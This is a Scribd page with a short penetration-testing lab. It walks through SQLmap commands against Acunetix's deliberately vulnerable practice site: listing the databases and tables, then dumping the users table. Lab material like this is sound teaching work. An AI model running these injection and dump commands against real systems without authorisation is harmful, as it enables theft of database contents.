0% found this document useful (0 votes)
23 views

SQLmap

SQLmap is an open-source tool that automates detecting and exploiting SQL injection flaws to take over database servers. It has a powerful detection engine and switches for fingerprinting databases, fetching data, accessing files, and executing commands. The document demonstrates using SQLmap to find SQL injection vulnerabilities on a vulnerable web application, identify the database and table names, and dump the data from the users table.

Uploaded by

Tarik Ameziane
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
23 views

SQLmap

SQLmap is an open-source tool that automates detecting and exploiting SQL injection flaws to take over database servers. It has a powerful detection engine and switches for fingerprinting databases, fetching data, accessing files, and executing commands. The document demonstrates using SQLmap to find SQL injection vulnerabilities on a vulnerable web application, identify the database and table names, and dump the data from the users table.

Uploaded by

Tarik Ameziane
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

Practical DAY 6

SQLMAP is an open-source penetration testing tool that automates the process of detecting and exploiting
SQL injection flaws and taking over of database servers. It comes with a powerful detection engine and a
broad range of switches including database fingerprinting, over data fetching from the database,
accessing the underlying file system and executing commands on the operating system via out-of-band
connections. SQLMAP is by default included in Kali.

For this practical we will use a webpage made by Acutenix which is made for learning purposes and
pentesting attacks are allowed.
Let us first check the parameters for using the tool:
sqlmap -h

Let us start the attack by using u that specifies the URL & --dbs to query for the available database name.
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” --dbs

The scan sent a lot of data confirming multiple vulenrabilities! One of the results is the list of available
databases:
[*] acuart
[*] information_schema

We will now get sqlmap to tell us what the available tables in the DB acuart are:
sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” -D acuart --tables

From the list of tables the one we are most interested is definitely users.

sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” -D acuart -T users --dump

You might also like